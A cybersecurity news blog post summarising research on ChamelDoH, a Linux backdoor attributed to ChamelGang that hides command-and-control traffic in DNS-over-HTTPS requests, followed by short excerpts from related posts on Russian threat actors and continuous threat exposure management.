ChamelDoH: New Linux Backdoor for Covert CnC Using DNS-over-HTTPS Tunnelling

 Recent observations of the notorious threat actor ChamelGang deploying a previously unknown Linux implant represent a substantial increase of their capabilities. By using DNS-over-HTTPS (DoH) tunnelling, the recently found virus, known as ChamelDoH by cybersecurity company Stairwell, communicates and engages in destructive operations. Positive Technologies initially revealed ChamelGang in September 2021, outlining their attacks on crucial businesses in several nations. The specifics of ChamelDoH, its distinctive communication mechanism, and the shifting strategies used by ChamelGang are covered in this article.

                                       




ChamelGang's Background and Attack Patterns:

ChamelGang's actions, which hit the aviation, energy, and fuel industries in Russia, the U.S., India, Nepal, Taiwan, and Japan, were first discovered by Positive Technologies. The threat actor used a passive backdoor known as DoorMe to obtain unauthorised access and carry out data theft attacks on Red Hat JBoss Enterprise Application and Microsoft Exchange servers. Based on cookie parameters, this native IIS module processed particular HTTP requests.


The Discovery of ChamelDoH:

Stairwell recently found the ChamelDoH Linux backdoor. This malware, which was developed in C++, aims to gather system information and offers remote access for a variety of functions, such as file upload, download, deletion, and shell command execution. ChamelDoH stands out because to its unique method of communication, which sends DNS TXT requests to a malicious nameserver using DNS-over-HTTPS (DoH).

Unique Communication Method and Benefits for Threat Actors:

DoH for command-and-control (C2) has numerous advantages for ChamelGang. It is challenging to quickly prevent malicious traffic at the company level when using widely-used DNS servers like Cloudflare and Google. Furthermore, adversary-in-the-middle (AitM) attacks are more difficult to launch because to the use of HTTPS encryption. This essentially establishes an encrypted communication path between the infected computers and the C2 server, making it more challenging for security software to detect and deny bogus DoH requests.


Challenges for Security Solutions and Detection:

Because ChamelDoH attacks employ domain fronting similar to C2 assaults, Daniel Mayer, a researcher at Stairwell, underlines how difficult it is to identify and thwart these attacks. Even if the requests are made for legitimate services located on content delivery networks (CDNs), the Host header on the requests points them to the C2 server. This evasion technique makes the identification and prevention procedures more difficult for security systems.


Implications of ChamelDoH Discovery:

According to Stairwell's study, ChamelGang has put a lot of time and effort into creating a reliable toolset for Linux incursions. The discovery of ChamelDoH highlights the threat actor's growing sophistication and broadening capabilities. To combat these changing dangers, organisations must maintain vigilance and modify their security systems. The discovery of the ChamelDoH Linux backdoor provides insight into the ChamelGang's ongoing efforts to improve their cyber capabilities. Security measures face significant challenges because ChamelGang uses DNS-over-HTTPS (DoH) for command-and-control communications to evade detection and eavesdropping. This development highlights the significance of firms maintaining current cybersecurity defences and being proactive in recognising and mitigating such risks.

As ChamelGang expands its assault vectors and targets critical enterprises, cybersecurity firms and law enforcement organisations must collaborate to develop effective defences. Exchanging threat intelligence, conducting in-depth investigations, and encouraging global cooperation are all necessary for dismantling the threat actors' infrastructure. In order to defend against ChamelGang and related attacks, organisations should prioritise comprehensive security procedures, such as regular system updates, vulnerability patching, network monitoring, and employee training on best practises for recognising and mitigating potential risks. Businesses that employ proactive security measures and stay one step ahead of hackers can better protect their crucial systems, data, and reputation in a hostile digital world.

Comments

Post a Comment

Popular posts from this blog

Microsoft Issues a Warning Regarding a New State-Sponsored Hacker Group in Russia With Negative Intent

Image
The General Staff Main Intelligence Directorate (GRU), according to Microsoft, is linked to Cadet Blizzard, a newly detected Russian threat actor. Due to its disruptive actions, the group's distinguishing designation has been given by the tech giant's Threat Intelligence division, which was previously tracking it as DEV-0586. Microsoft claims that despite Cadet Blizzard's high risk, it has less operational security than more established and sophisticated Russian outfits like Seashell Blizzard and Forest Blizzard.                                                             First discovered in January 2022, Cadet Blizzard committed in damaging cyberattacks against Ukraine, mainly employing a special malware called WhisperGate or PAYWIPE, a wiper. These assaults took place in the days before Russia's armed invasi...
Read more

A New Report Exposes Shuckworm's Persistent Hacks Against Ukrainian Organisations

Image
Russian threat actor Shuckworm, a member of the Federal Security Service (FSB) of Russia, has stepped up its cyberattack campaign targeting Ukrainian organisations in an effort to infiltrate their environments and steal important data. According to a Symantec analysis, the most common targets of the current breaches, which started in February or March 2023, were security services, military, and governmental organisations.                               The cybersecurity firm disclosed that the Russian gang had carried out persistent breaches, some of which lasted as long as three months. During these attacks, Shuckworm's goal is to access sensitive data and exfiltrate it. Reports on the fatalities of Ukrainian service members, enemy engagements and airstrikes, reports on the inventory of the armament, reports on training, and more make up the targeted data. Shuckworm has been active at least since 2...
Read more

A Framework for Improved Security: Continuous Threat Exposure Management (CTEM)

Image
 Acronyms are commonplace in the rapidly developing subject of cybersecurity, and new ones are constantly being created. Continuous Threat Exposure Management, or CTEM, is one of the acronyms that are now popular. Companies implementing CTEM programmes may run into unexpected difficulties that impede their development and cause setbacks. This article seeks to clarify CTEM, its objectives, and the challenges that businesses must overcome to successfully apply it.                It's critical to comprehend what Continuous Threat Exposure Management comprises before diving into the difficulties. CTEM is not a technology or a specific product that suppliers sell. Instead, it's a constant 5-stage programme or framework made to assist organisations in tracking, assessing, and lowering their level of exploitability. Its goal is to deliver a standardised and practical security posture correction and improvement plan that corporate executives can...
Read more